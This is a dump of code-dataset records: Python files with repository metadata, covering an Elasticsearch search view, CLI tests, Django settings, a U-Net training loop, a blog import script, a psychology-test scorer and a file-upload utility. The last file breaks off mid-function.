Dataset schema (one record per source file; each record below lists its metadata cells on one line, then the `content` cell as a code block, then its derived metric cells on one line):

| column | type | length / value range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 5 – 2.06M |
| ext | string | 10 classes |
| lang | string | 1 value |
| max_stars_repo_path | string | length 3 – 248 |
| max_stars_repo_name | string | length 5 – 125 |
| max_stars_repo_head_hexsha | string | length 40 – 78 |
| max_stars_repo_licenses | list | length 1 – 10 |
| max_stars_count | int64 | 1 – 191k (nullable) |
| max_stars_repo_stars_event_min_datetime | string | length 24 (nullable) |
| max_stars_repo_stars_event_max_datetime | string | length 24 (nullable) |
| max_issues_repo_path | string | length 3 – 248 |
| max_issues_repo_name | string | length 5 – 125 |
| max_issues_repo_head_hexsha | string | length 40 – 78 |
| max_issues_repo_licenses | list | length 1 – 10 |
| max_issues_count | int64 | 1 – 67k (nullable) |
| max_issues_repo_issues_event_min_datetime | string | length 24 (nullable) |
| max_issues_repo_issues_event_max_datetime | string | length 24 (nullable) |
| max_forks_repo_path | string | length 3 – 248 |
| max_forks_repo_name | string | length 5 – 125 |
| max_forks_repo_head_hexsha | string | length 40 – 78 |
| max_forks_repo_licenses | list | length 1 – 10 |
| max_forks_count | int64 | 1 – 105k (nullable) |
| max_forks_repo_forks_event_min_datetime | string | length 24 (nullable) |
| max_forks_repo_forks_event_max_datetime | string | length 24 (nullable) |
| content | string | length 5 – 2.06M |
| avg_line_length | float64 | 1 – 1.02M |
| max_line_length | int64 | 3 – 1.03M |
| alphanum_fraction | float64 | 0 – 1 |
| count_classes | int64 | 0 – 1.6M |
| score_classes | float64 | 0 – 1 |
| count_generators | int64 | 0 – 651k |
| score_generators | float64 | 0 – 1 |
| count_decorators | int64 | 0 – 990k |
| score_decorators | float64 | 0 – 1 |
| count_async_functions | int64 | 0 – 235k |
| score_async_functions | float64 | 0 – 1 |
| count_documentation | int64 | 0 – 1.04M |
| score_documentation | float64 | 0 – 1 |
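The records that follow are easier to work with programmatically than by reading the dump. Below is a minimal sketch of loading and filtering a shard with this schema; it assumes the rows are stored as Parquet and that pandas (with a Parquet engine such as pyarrow) is available. The file name and the score/line-length thresholds are placeholders for illustration, not values taken from this dump.

```python
import pandas as pd

# Load one shard of records with the schema above; "code-shard-00000.parquet"
# is a placeholder name, not a file referenced by this dump.
df = pd.read_parquet("code-shard-00000.parquet")

# Each record is one Python blob: `hexsha` identifies it, `content` holds the
# raw source, and the count_*/score_* columns summarise classes, generators,
# decorators, async functions, and documentation found in that source.
expected = {"hexsha", "content", "size", "score_documentation", "max_line_length"}
missing = expected - set(df.columns)
if missing:
    raise ValueError(f"shard is missing columns: {missing}")

# Example filter: keep reasonably documented files without extreme line lengths.
keep = df[(df["score_documentation"] >= 0.1) & (df["max_line_length"] <= 1000)]

print(f"kept {len(keep)} of {len(df)} records")
print(keep[["max_stars_repo_name", "max_stars_repo_path", "size"]].head())
```

If only the metadata is needed for filtering, passing `columns=[...]` to `read_parquet` avoids pulling the large `content` strings into memory.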
058a7c137ede0bf5c3a55a3ce41c3dfb2936df30 | 2,079 | py | Python | src/views/list.py | AllForJan/prizma-backend | fe866e74fa01e900cc7eab624bb5716a4bae056d | ["MIT"] | 2 | 2018-04-08T22:18:11.000Z | 2018-04-26T08:12:46.000Z | src/views/list.py | AllForJan/prizma-backend | fe866e74fa01e900cc7eab624bb5716a4bae056d | ["MIT"] | null | null | null | src/views/list.py | AllForJan/prizma-backend | fe866e74fa01e900cc7eab624bb5716a4bae056d | ["MIT"] | 2 | 2018-04-08T22:18:13.000Z | 2018-04-08T22:18:18.000Z |
from elasticsearch import Elasticsearch
from flask import request, jsonify
from flask_restful import Resource
from db.manager import get_conn
import settings
conn = get_conn()
def append_range_filter(f, key, _from, to):
d = {}
if _from or to:
d['range'] = {}
d['range'][key] = {}
if _from:
d['range'][key]['gte'] = _from
if to:
d['range'][key]['lte'] = to
f.append(d)
return f
class ListPO(Resource):
def get(self):
q = request.args.get('q', None)
es = Elasticsearch(
[settings.ELASTIC_HOST, ],
timeout=30, max_retries=10, retry_on_timeout=True, port=settings.ELASTIC_PORT
)
if not q:
query = {'query': {'match_all': {}}}
results = es.search(index='apa', doc_type='po', body=query)
rows = [{
'data': r['_source'], '_id': r['_id']
} for r in results['hits']['hits']]
return jsonify(rows)
rok_from = request.args.get('rok_from', None)
rok_to = request.args.get('rok_to', None)
suma_from = request.args.get('suma_from', None)
suma_to = request.args.get('suma_to')
# append filters
f = []
append_range_filter(f, 'rok', rok_from, rok_to)
append_range_filter(f, 'suma', suma_from, suma_to)
query = {
"sort": [
{"suma": {"order": "desc"}}
],
"query": {
"bool": {
"must": [
{
"match": {
"meno": {"query":q, "operator": "and"}
}
},
],
# "filter": []
}
}
}
query['query']['bool']['must'].extend(f)
results = es.search(index='apa', doc_type='po', body=query)
rows = [{
'data': r['_source'], '_id': r['_id']
} for r in results['hits']['hits']]
return rows
| 25.353659 | 89 | 0.457431 | 1,636 | 0.786917 | 0 | 0 | 0 | 0 | 0 | 0 | 328 | 0.157768 |
058ba31e5a3c9cecbd73c880b21c4ea42a75e1cf | 3,056 | py | Python | tests/test_cli.py | SlawekNowy/vpk | 3c9e175f48d8d56b5995387bcaa2c16ec62f9688 | ["MIT"] | 116 | 2015-08-29T23:24:28.000Z | 2022-03-04T19:35:52.000Z | tests/test_cli.py | SlawekNowy/vpk | 3c9e175f48d8d56b5995387bcaa2c16ec62f9688 | ["MIT"] | 27 | 2015-07-30T16:44:17.000Z | 2021-12-25T19:00:44.000Z | tests/test_cli.py | SlawekNowy/vpk | 3c9e175f48d8d56b5995387bcaa2c16ec62f9688 | ["MIT"] | 21 | 2015-08-03T23:57:25.000Z | 2021-12-21T10:29:59.000Z |
import sys
import unittest
from contextlib import contextmanager
try:
from io import StringIO
except ImportError:
from StringIO import StringIO
from vpk import cli
@contextmanager
def capture_stdout():
new_out = StringIO()
old_out = sys.stdout
try:
sys.stdout = new_out
yield sys.stdout
finally:
sys.stdout = old_out
class testcase_cli(unittest.TestCase):
def setUp(self):
self.vpk_path = './tests/test_dir.vpk'
self.parser = cli.make_argparser()
self.vpk_content = ['testfile1.txt', 'testdir/testfile2.txt', 'a/b/c/d/testfile3.bin']
def run_cli_with_args(self, args):
args = self.parser.parse_args(args)
with capture_stdout() as stdout:
cli.run(args)
stdout = stdout.getvalue().split()
return stdout
def test_cli_list(self):
stdout = self.run_cli_with_args([self.vpk_path, '--list'])
self.assertEqual(len(stdout), len(self.vpk_content))
for expected_content in self.vpk_content:
self.assertIn(expected_content, stdout)
def test_cli_list_filter_filter(self):
# filter on file name
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--filter', '*file2*'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# filter on dir name
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--filter', 'testdir*'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# use filter as exclusion
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--filter', '*file2*', '-v'])
self.assertEqual(len(stdout), 2)
self.assertIn(self.vpk_content[0], stdout)
self.assertIn(self.vpk_content[2], stdout)
def test_cli_list_filter_name(self):
# filter on file name
stdout = self.run_cli_with_args([self.vpk_path, '--list', '-name', '*file2*'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# filter on dir name (should not work)
stdout = self.run_cli_with_args([self.vpk_path, '--list', '-name', 'testdir*'])
self.assertEqual(len(stdout), 0)
# use filter as exclusion
stdout = self.run_cli_with_args([self.vpk_path, '--list', '-name', '*file2*', '-v'])
self.assertEqual(len(stdout), 2)
self.assertIn(self.vpk_content[0], stdout)
self.assertIn(self.vpk_content[2], stdout)
def test_cli_list_filter_regex(self):
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--regex', r'file2\.t[tx]{2}$'])
self.assertEqual(len(stdout), 1)
self.assertIn(self.vpk_content[1], stdout)
# use filter as exclusion
stdout = self.run_cli_with_args([self.vpk_path, '--list', '--regex', r'file2\.t[tx]{2}$', '-v'])
self.assertEqual(len(stdout), 2)
self.assertIn(self.vpk_content[0], stdout)
self.assertIn(self.vpk_content[2], stdout)
| 35.534884 | 105 | 0.634162 | 2,684 | 0.878272 | 176 | 0.057592 | 192 | 0.062827 | 0 | 0 | 505 | 0.165249 |
058c253ae43e29116887b045dfd233f62ef4ccf0 | 218 | py | Python | cpab/cpaNd/model/__init__.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | ["MIT"] | 17 | 2016-03-16T21:35:36.000Z | 2021-11-11T04:16:21.000Z | cpab/cpaNd/model/__init__.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | ["MIT"] | null | null | null | cpab/cpaNd/model/__init__.py | freifeld/cpabDiffeo | 22df6cdbd7111b9ae3e7f1c0e31ff85e92d281a6 | ["MIT"] | 4 | 2016-08-12T23:02:09.000Z | 2019-03-14T18:20:36.000Z |
from _LogLikelihood import LogLikelihood
from _LogPrior import LogPrior
#from _ScaleDependentLogLikelihoodGaussian import ScaleDependentLogLikelihoodGaussian
from _ScaleDependentLogPrior import ScaleDependentLogPrior
| 36.333333 | 85 | 0.917431 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 85 | 0.389908 |
058c66b876771cc78eea5a8cc9478dd196dd972b | 1,768 | py | Python | authentic/authentic.settings.py | GuillaumeGautierLA/publik | 5ef6c19e9b91bf066717b4bc9df2540f4c2e1bc2 | ["MIT"] | null | null | null | authentic/authentic.settings.py | GuillaumeGautierLA/publik | 5ef6c19e9b91bf066717b4bc9df2540f4c2e1bc2 | ["MIT"] | 13 | 2019-12-21T09:48:42.000Z | 2020-07-01T19:12:28.000Z | authentic/authentic.settings.py | GuillaumeGautierLA/publik | 5ef6c19e9b91bf066717b4bc9df2540f4c2e1bc2 | ["MIT"] | 4 | 2020-01-06T16:00:00.000Z | 2021-01-08T14:46:29.000Z |
# To pass env vars to Python scripts run by Publik in services which remove custom env vars:
# https://unix.stackexchange.com/questions/44370/how-to-make-unix-service-see-environment-variables
# So we hardcode the values in the file below when the container starts
import sys
sys.path.insert(0, "/home")
from pyenv import *
# Databases
DATABASES['default']['ENGINE'] = 'tenant_schemas.postgresql_backend'
DATABASES['default']['NAME'] = DB_AUTHENTIC_NAME
DATABASES['default']['USER'] = DB_AUTHENTIC_USER
DATABASES['default']['PASSWORD'] = DB_AUTHENTIC_PASS
DATABASES['default']['HOST'] = 'db'
DATABASES['default']['PORT'] = DB_PORT
BROKER_URL = 'amqp://{user}:{password}@rabbitmq:{port}//'.format(
user=RABBITMQ_DEFAULT_USER,
password=RABBITMQ_DEFAULT_PASS,
port=RABBITMQ_PORT,
)
# Zone
LANGUAGE_CODE = 'fr-fr'
TIME_ZONE = 'Europe/Paris'
# Email configuration
ADMINS = (
(ERROR_MAIL_AUTHOR, ERROR_MAIL_ADDR),
)
EMAIL_SUBJECT_PREFIX = '[authentic] '
SERVER_EMAIL = ERROR_MAIL_ADDR
DEFAULT_FROM_EMAIL = ERROR_MAIL_ADDR
# SMTP configuration
EMAIL_HOST = SMTP_HOST
EMAIL_HOST_USER = SMTP_USER
EMAIL_HOST_PASSWORD = SMTP_PASS
EMAIL_PORT = SMTP_PORT
# HTTPS Security
CSRF_COOKIE_SECURE = True
SESSION_COOKIE_SECURE = True
# Idp
# SAML 2.0 IDP
#A2_IDP_SAML2_ENABLE = False
# CAS 1.0 / 2.0 IDP
#A2_IDP_CAS_ENABLE = False
# OpenID 1.0 / 2.0 IDP
#A2_IDP_OPENID_ENABLE = False
# Authentifications
#A2_AUTH_PASSWORD_ENABLE = True
#A2_SSLAUTH_ENABLE = False
CACHES = {
'default': {
'BACKEND': 'hobo.multitenant.cache.TenantCache',
'REAL_BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
# Role provisionning via local RabbitMQ
HOBO_ROLE_EXPORT = True
LOGGING = LOGGING_FROM_PYENV
| 26.38806 | 99 | 0.750566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 963 | 0.544683 |
058f090a9e7707433a3105b87e3e591439fed2ac | 8,377 | py | Python | code/train/train_model.py | 96jhwei/Genetic-U-Net | 25116f01afcf8ed4386cd0fc258da15e1c982cb5 | ["MIT"] | 14 | 2021-09-09T11:22:17.000Z | 2022-03-14T10:06:36.000Z | code/train/train_model.py | 96jhwei/Genetic-U-Net | 25116f01afcf8ed4386cd0fc258da15e1c982cb5 | ["MIT"] | 1 | 2021-11-24T10:30:36.000Z | 2021-11-24T10:30:36.000Z | code/train/train_model.py | 96jhwei/Genetic-U-Net | 25116f01afcf8ed4386cd0fc258da15e1c982cb5 | ["MIT"] | 5 | 2021-11-02T09:29:49.000Z | 2022-03-25T09:44:25.000Z |
import numpy
from torch.utils.data import DataLoader
from tqdm import tqdm
from loss.FocalLoss import FocalLossForSigmoid
import torch
from metrics.calculate_metrics import calculate_metrics
import shutil
from metrics.average_meter import AverageMeter
import torch.multiprocessing
from torch.nn.utils.clip_grad import clip_grad_norm_
import os
import sys
import numpy as np
import random
from thop import profile
from .util.get_optimizer import get_optimizer
from dataset.util.get_datasets import get_datasets
import multiprocessing as mp
sys.path.append('../')
def train_one_model(optimizer_name, learning_rate, l2_weight_decay, gen_num, ind_num, model, batch_size, epochs, device,
train_set_name, valid_set_name,
train_set_root, valid_set_root, exp_name,
mode='train'):
seed = 12
torch.cuda.empty_cache()
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
random.seed(seed)
np.random.seed(seed)
torch.backends.cudnn.benchmark = True
model.to(device)
model.train()
loss_func = FocalLossForSigmoid(reduction='mean').to(device)
optimizer = get_optimizer(optimizer_name, filter(lambda p: p.requires_grad, model.parameters()), learning_rate, l2_weight_decay)
train_set, num_return = get_datasets(train_set_name, train_set_root, True)
valid_set, _ = get_datasets(valid_set_name, valid_set_root, False)
train_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True, num_workers=3)
valid_loader = DataLoader(dataset=valid_set, batch_size=1, shuffle=False, num_workers=1)
best_f1_score = 0
flag = 0
count = 0
valid_epoch = 80
metrics_name = ['flops', 'param', 'accuracy', 'recall', 'specificity', 'precision', 'f1_score', 'auroc', 'iou']
metrics = {}
for metric_name in metrics_name:
if metric_name == 'flops' or metric_name == 'param':
metrics.update({metric_name: 100})
else:
metrics.update({metric_name: 0})
try:
for i in range(epochs):
train_tqdm_batch = tqdm(iterable=train_loader, total=numpy.ceil(len(train_set) / batch_size))
for images, targets in train_tqdm_batch:
images, targets = images.to(device), targets.to(device)
optimizer.zero_grad()
preds = model(images)
loss = loss_func(preds, targets)
loss.backward()
clip_grad_norm_(model.parameters(), 0.1)
optimizer.step()
train_tqdm_batch.close()
print('gens_{} individual_{}_epoch_{} train end'.format(gen_num, ind_num, i))
epoch_acc = AverageMeter()
epoch_recall = AverageMeter()
epoch_precision = AverageMeter()
epoch_specificity = AverageMeter()
epoch_f1_score = AverageMeter()
epoch_iou = AverageMeter()
epoch_auroc = AverageMeter()
if (i >= valid_epoch):
with torch.no_grad():
model.eval()
valid_tqdm_batch = tqdm(iterable=valid_loader, total=numpy.ceil(len(valid_set) / 1))
for images, targets in valid_tqdm_batch:
images = images.to(device)
targets = targets.to(device)
preds = model(images)
(acc, recall, specificity, precision,
f1_score, iou, auroc) = calculate_metrics(preds=preds, targets=targets, device=device)
epoch_acc.update(acc)
epoch_recall.update(recall)
epoch_precision.update(precision)
epoch_specificity.update(specificity)
epoch_f1_score.update(f1_score)
epoch_iou.update(iou)
epoch_auroc.update(auroc)
if i == valid_epoch:
flops, param = profile(model=model, inputs=(images,), verbose=False)
flops = flops / 1e11
param = param / 1e6
print('gens_{} individual_{}_epoch_{} validate end'.format(gen_num, ind_num, i))
print('acc:{} | recall:{} | spe:{} | pre:{} | f1_score:{} | auroc:{}'
.format(epoch_acc.val,
epoch_recall.val,
epoch_specificity.val,
epoch_precision.val,
epoch_f1_score.val,
epoch_auroc.val))
if epoch_f1_score.val > best_f1_score:
best_f1_score = epoch_f1_score.val
flag = i
count = 0
for key in list(metrics):
if key == 'flops':
metrics[key] = flops
elif key == 'param':
metrics[key] = param
elif key == 'accuracy':
metrics[key] = epoch_acc.val
elif key == 'recall':
metrics[key] = epoch_recall.val
elif key == 'specificity':
metrics[key] = epoch_specificity.val
elif key == 'precision':
metrics[key] = epoch_precision.val
elif key == 'f1_score':
metrics[key] = epoch_f1_score.val
elif key == 'auroc':
metrics[key] = epoch_auroc.val
elif key == 'iou':
metrics[key] = epoch_iou.val
else:
raise NotImplementedError
import pandas as pd
from os.path import join
performance_df = pd.DataFrame(
data=[[gen_num, ind_num, epoch_acc.val, epoch_recall.val, epoch_specificity.val,
epoch_precision.val,
epoch_f1_score.val, epoch_iou.val, epoch_auroc.val]],
columns=['epoch', 'individual', 'acc', 'recall',
'specificity', 'precision', 'f1_score', 'iou',
'auroc', ]
)
performance_csv_path = join(os.path.abspath('.'), 'exps/{}/csv'.format(exp_name),
'gens_{} individual_{} performance.csv'.format(gen_num, ind_num))
performance_df.to_csv(performance_csv_path)
else:
if i >= valid_epoch:
count += 1
end = None
if i > valid_epoch + 15 and best_f1_score < 0.50:
end = True
if (count >= 70) or end:
print('current best epoch_{} best_f1_score:'.format(flag), best_f1_score)
print('gens_{} individual_{} train early stop'.format(gen_num, ind_num))
print('=======================================================================')
valid_tqdm_batch.close()
return metrics, True
print('current best epoch_{} best_f1_score:'.format(flag), best_f1_score)
valid_tqdm_batch.close()
print('current best epoch_{} best_f1_score:'.format(flag), best_f1_score)
print('=======================================================================')
except RuntimeError as exception:
images.detach_()
del images
del model
del targets
return metrics, False
return metrics, True
| 45.037634 | 133 | 0.493613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 771 | 0.092038 |
059016200f557d7398f34c3a96008e7fee9686c3 | 961 | py | Python | dataset/check_for_duplicates.py | mathildor/TF-SegNet | dff209c8174b5e8fa77b4c2644298f6903a09445 | ["MIT"] | 98 | 2017-11-06T15:55:22.000Z | 2022-03-22T11:29:47.000Z | dataset/check_for_duplicates.py | yingz9/TF-SegNet | dff209c8174b5e8fa77b4c2644298f6903a09445 | ["MIT"] | 8 | 2017-11-15T06:05:41.000Z | 2019-06-19T06:53:03.000Z | dataset/check_for_duplicates.py | yingz9/TF-SegNet | dff209c8174b5e8fa77b4c2644298f6903a09445 | ["MIT"] | 34 | 2017-11-06T03:05:54.000Z | 2022-01-25T16:00:09.000Z |
import os
from PIL import Image
import numpy
from PIL import ImageChops
""" TESTED:
No duplicates in:
- within validation images first part (stopped because of training - took to much time)
"""
image_path="../../IR_images/combined_dataset/val_images/images"
# image_path="../../IR_images/combined_dataset/val_images/images"
images = sorted(os.listdir(image_path))
for image_file_1 in images:
for image_file_2 in images:
image1 = Image.open(os.path.join(image_path,image_file_1))
image2 = Image.open(os.path.join(image_path,image_file_2))
#pixels = image.load()
if ImageChops.difference(image1, image2).getbbox() is None:
# if(image1==image2):# and image_file_1 != image_file_2):
print("Same image!!!")
print(image_file_1)
print(image_file_2)
# else:
# print("not same")
# print(image_file_1)
# print(image_file_2)
| 26.694444 | 95 | 0.648283 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 427 | 0.444329 |
059038232d1c85e48c2eed487377d93d1ad944f4 | 1,983 | py | Python | _posts/import.py | suepeng/suepeng.github.io | 844e0063e0604a77886aad5eaea588c4df2792a9 | ["MIT"] | null | null | null | _posts/import.py | suepeng/suepeng.github.io | 844e0063e0604a77886aad5eaea588c4df2792a9 | ["MIT"] | null | null | null | _posts/import.py | suepeng/suepeng.github.io | 844e0063e0604a77886aad5eaea588c4df2792a9 | ["MIT"] | null | null | null |
import os, glob
from dateutil import parser
from bs4 import BeautifulSoup
ext = lambda line, cap: line.replace("\s", "").replace(cap, "").strip()
def write_post(doc):
meta = {
'title' : ext(doc[0], "TITLE:"),
'date' : parser.parse(ext(doc[2], "DATE:")).strftime("%Y-%m-%d"),
'tag' : ext(doc[3], "PRIMARY CATEGORY:"),
'status': ext(doc[4], "STATUS:"),
'imgs' : BeautifulSoup("".join(doc), features="html.parser").find_all('img'),
}
if not os.path.exists(meta['tag']):
os.makedirs(meta['tag'])
fname = f"{meta['tag']}/{meta['date']}-{meta['title'].replace('/', ' ')}.md"
publish = 'true' if meta['status'] == 'publish' else 'false'
feature = meta['imgs'][0].attrs['src'] if len(meta['imgs']) > 0 else None
with open(fname, "wt") as f:
# write meta
f.write("---\n")
f.write(f"layout: post\n")
f.write(f"title: {meta['title']}\n")
f.write(f"date: {meta['date']}\n")
f.write(f"tag: {meta['tag']}\n")
if feature:
f.write(f"feature: \"{feature}\"\n")
f.write(f"published: {publish} \n")
f.write("---\n")
# write boddy
body = False
for d in doc:
if (d[:3] == '---'):
continue
if ('<!-- more -->' in d):
d = d.replace('<!-- more -->', "").strip()
if len(d) > 0 and body:
f.write(d)
body = ('BODY' in d) or body
print(f"done {fname}")
return True
#------------------------------
# Main
#------------------------------
if __name__ == "__main__":
posts = 0
doc = []
for idx, line in enumerate(open("raw.txt").readlines()):
if len(doc) and ('TITLE:' in line):
posts += write_post(doc)
doc, meta = [], {}
doc.append(line)
# latest post
posts += write_post(doc)
print(f"converted {posts} posts with {idx} lines")
| 31.983871 | 86 | 0.474534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 639 | 0.322239 |
0594a8c465e7b18e9888443f247ba1cf8ff7c9cf | 702 | py | Python | layers/reshape.py | WJGiles/Dorknet | 1582937e843b1a911334291c25ea415fb56e5ccc | ["MIT"] | null | null | null | layers/reshape.py | WJGiles/Dorknet | 1582937e843b1a911334291c25ea415fb56e5ccc | ["MIT"] | null | null | null | layers/reshape.py | WJGiles/Dorknet | 1582937e843b1a911334291c25ea415fb56e5ccc | ["MIT"] | 1 | 2020-07-27T17:03:22.000Z | 2020-07-27T17:03:22.000Z |
import numpy as np
from .layer import Layer
class ReshapeLayer(Layer):  # inherit from the imported Layer base so the super() call resolves
    def __init__(self, layer_name, input_shape, output_shape):
        super().__init__(layer_name)
self.input_shape = input_shape
self.output_shape = output_shape
def __repr__(self):
s = "ReshapeLayer(input_shape={}, output_shape={})".format(self.input_shape,
self.output_shape)
return s
def forward(self, X, test_mode=False):
return X.reshape(self.output_shape)
def backward(self, upstream_dx):
return upstream_dx.reshape(self.input_shape)
| 33.428571 | 85 | 0.564103 | 657 | 0.935897 | 0 | 0 | 0 | 0 | 0 | 0 | 47 | 0.066952 |
059744913f1e643dc9fe5a6332d2aff7847d00ed | 3,342 | py | Python | Project/checking_test2.py | mihdenis85/psycho_test | 51bbe82043427d48e80ff36197815212c5c2a14c | ["MIT"] | null | null | null | Project/checking_test2.py | mihdenis85/psycho_test | 51bbe82043427d48e80ff36197815212c5c2a14c | ["MIT"] | null | null | null | Project/checking_test2.py | mihdenis85/psycho_test | 51bbe82043427d48e80ff36197815212c5c2a14c | ["MIT"] | null | null | null |
def specialization(a, spec, jobs):
if a>=0 and a<=2:
return(spec + ': интерес к данной профессиональной сфере не выражен')
elif a>=3 and a<=6:
return(spec + ': профессиональная направленность и интерес выражены в средней степени. ' + 'Возможно вам будут интересны такие профессии будущего, как ' + jobs)
elif a>=7 and a<=8:
return(spec +': профессиональная направленность выражена довольно ярко и отчетливо. ' + 'Вам будут интересны такие профессии, которые будут актуальны в будущем, как '+ jobs)
def check_test2(answers):
p=0
chez1=0
t=0
z=0
h=0
n=answers[0]
if n==1:
p+=1
elif n==2:
t+=1
n=answers[1]
if n==1:
chez1+=1
elif n==2:
z+=1
n=answers[2]
if n==1:
h+=1
elif n==2:
p+=1
n=answers[3]
if n==1:
t+=1
elif n==2:
chez1+=1
n=answers[4]
if n==1:
z+=1
elif n==2:
h+=1
n=answers[5]
if n==1:
p+=1
elif n==2:
chez1+=1
n=answers[6]
if n==1:
h+=1
elif n==2:
t+=1
n=answers[7]
if n==1:
chez1+=1
elif n==2:
h+=1
n=answers[8]
if n==1:
t+=1
elif n==2:
z+=1
n=answers[9]
if n==1:
p+=1
elif n==2:
z+=1
n=answers[10]
if n==1:
p+=1
elif n==2:
t+=1
n=answers[11]
if n==1:
chez1+=1
elif n==2:
z+=1
n=answers[12]
if n==1:
h+=1
elif n==2:
p+=1
n=answers[13]
if n==1:
t+=1
elif n==2:
chez1+=1
n=answers[14]
if n==1:
z+=1
elif n==2:
h+=1
n=answers[15]
if n==1:
p+=1
elif n==2:
chez1+=1
n=answers[16]
if n==1:
h+=1
elif n==2:
t+=1
n=answers[17]
if n==1:
chez1+=1
elif n==2:
h+=1
n=answers[18]
if n==1:
t+=1
elif n==2:
z+=1
n=answers[19]
if n==1:
p+=1
elif n==2:
z+=1
pechat1=specialization(p, 'Природа', 'ИТ-генетик, Биофармаколог, Архитектор живых систем, Парковый эколог, ГМО-агроном, Портовый эколог, Сельскохозяйственный эколог, Космобиолог, Урбанист-эколог')
pechat2=specialization(t, 'Техника', 'Проектировщик композитных конструкций для транспортных средств, Проектировщик нанотехнологических материалов, Глазир, Архитектор территорий, Конструктор новых металлов')
pechat3=specialization(chez1, 'Сфера обслуживания', 'Врач, Генетический консультант, Молекулярный диетолог, Тренер творческих занятий, Личный тьютор по эстетическому развитию, Разработчик персональных пенсионных акладов')
pechat4=specialization(z, 'Точные науки и музыка(игра на музыкальных инструментах)', 'Музыкант, Танцор, Переводчик фильмов, Энергоаудитор, Оператор Многофункциональных технических комплексов, Агроном экономист, ')
pechat5=specialization(h, 'Творческие профессии', 'Создатель спецэффектов, Видеохудожник, Театральный художник, Аранжировщик, Шоураннер, Балетмейстер, Дирижёр, Живописец, Танцор, Режиссер, Художник-технолог, Science-художник, Видеограф, Специалист по озвучиванию и звуковым спецэффектам в кино, Инфо-стилист, Архитектор виртуальности')
return pechat1 + ' ' + pechat2 + ' ' + pechat3 + ' ' + pechat4 + ' ' + pechat5
| 27.85 | 339 | 0.578995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,515 | 0.561008 |
05975def902880bc29f1fd9e4b623039913f810f | 4,003 | py | Python | src/upload/upload.py | alliance-genome/agr_ferret | e2ccef16308b1a8a6f1b2a3dde6e29e0530da721 | ["MIT"] | 2 | 2020-07-22T14:25:00.000Z | 2021-09-20T18:29:08.000Z | src/upload/upload.py | alliance-genome/agr_ferret | e2ccef16308b1a8a6f1b2a3dde6e29e0530da721 | ["MIT"] | 6 | 2019-09-24T14:09:42.000Z | 2021-06-07T15:27:55.000Z | src/upload/upload.py | alliance-genome/agr_ferret | e2ccef16308b1a8a6f1b2a3dde6e29e0530da721 | ["MIT"] | 3 | 2020-12-19T08:57:51.000Z | 2020-12-19T08:58:09.000Z |
# Functions for use in downloading files.
import logging, os, requests, json, hashlib, urllib
from requests_toolbelt.utils import dump
from retry import retry
logger = logging.getLogger(__name__)
def create_md5(worker, filename, save_path):
# Generate md5
logger.info('{}: Generating md5 hash for {}.'.format(worker, filename))
hash_md5 = hashlib.md5()
with open(os.path.join(save_path, filename), 'rb') as f:
for chunk in iter(lambda: f.read(4096), b''):
hash_md5.update(chunk)
logger.info('{}: Finished generating md5 hash: {}'.format(worker, hash_md5.hexdigest()))
return hash_md5.hexdigest()
def upload_file(worker, filename, save_path, upload_file_prefix, config_info):
file_to_upload = {upload_file_prefix: open(os.path.join(save_path, filename), 'rb')}
headers = {
'Authorization': 'Bearer {}'.format(config_info.config['API_KEY'])
}
logger.debug('{}: Attempting upload of data file: {}'.format(worker, os.path.join(save_path, filename)))
logger.debug('{}: Attempting upload with header: {}'.format(worker, headers))
logger.info("{}: Uploading data to {}) ...".format(worker, config_info.config['FMS_API_URL']+'/api/data/submit/'))
response = requests.post(config_info.config['FMS_API_URL']+'/api/data/submit/', files=file_to_upload, headers=headers)
logger.info(response.text)
@retry(tries=5, delay=5, logger=logger)
def upload_process(worker, filename, save_path, data_type, data_sub_type, config_info):
release = config_info.config['ALLIANCE_RELEASE']
upload_file_prefix = '{}_{}_{}'.format(release, data_type, data_sub_type)
generated_md5 = create_md5(worker, filename, save_path)
# Attempt to grab MD5 for the latest version of the file.
logger.debug(config_info.config['FMS_API_URL'] + '/api/datafile/by/{}/{}?latest=true'.format(data_type, data_sub_type))
url_to_check = config_info.config['FMS_API_URL'] + '/api/datafile/by/{}/{}?latest=true'.format(data_type, data_sub_type)
chip_response = urllib.request.urlopen(url_to_check)
chip_data = data = json.loads(chip_response.read().decode(chip_response.info().get_param('charset') or 'utf-8'))
logger.debug('{}: Retrieved API data from chipmunk: {}'.format(worker, chip_data))
# Check for existing MD5
logger.info('{}: Checking for existing MD5 from chipmunk.'.format(worker))
# Logic for uploading new files based on existing and new MD5s.
if not chip_data:
logger.info('{}: No response received from the FMS. A new file will be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
upload_file(worker, filename, save_path, upload_file_prefix, config_info)
else:
existing_md5 = chip_data[0].get('md5Sum')
if existing_md5:
logger.info('{}: Previous MD5 found: {}'.format(worker, existing_md5))
if existing_md5 == generated_md5:
logger.info('{}: Existing MD5 matches the newly generated MD5. The file will not be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
logger.info('{}: Existing: {} New: {}'.format(worker, existing_md5, generated_md5))
else:
logger.info('{}: Existing MD5 does not match the newly generated MD5. A new file will be uploaded.'.format(worker))
logger.info('{}: File: {}'.format(worker, filename))
logger.info('{}: Existing: {} New: {}'.format(worker, existing_md5, generated_md5))
upload_file(worker, filename, save_path, upload_file_prefix, config_info)
else:
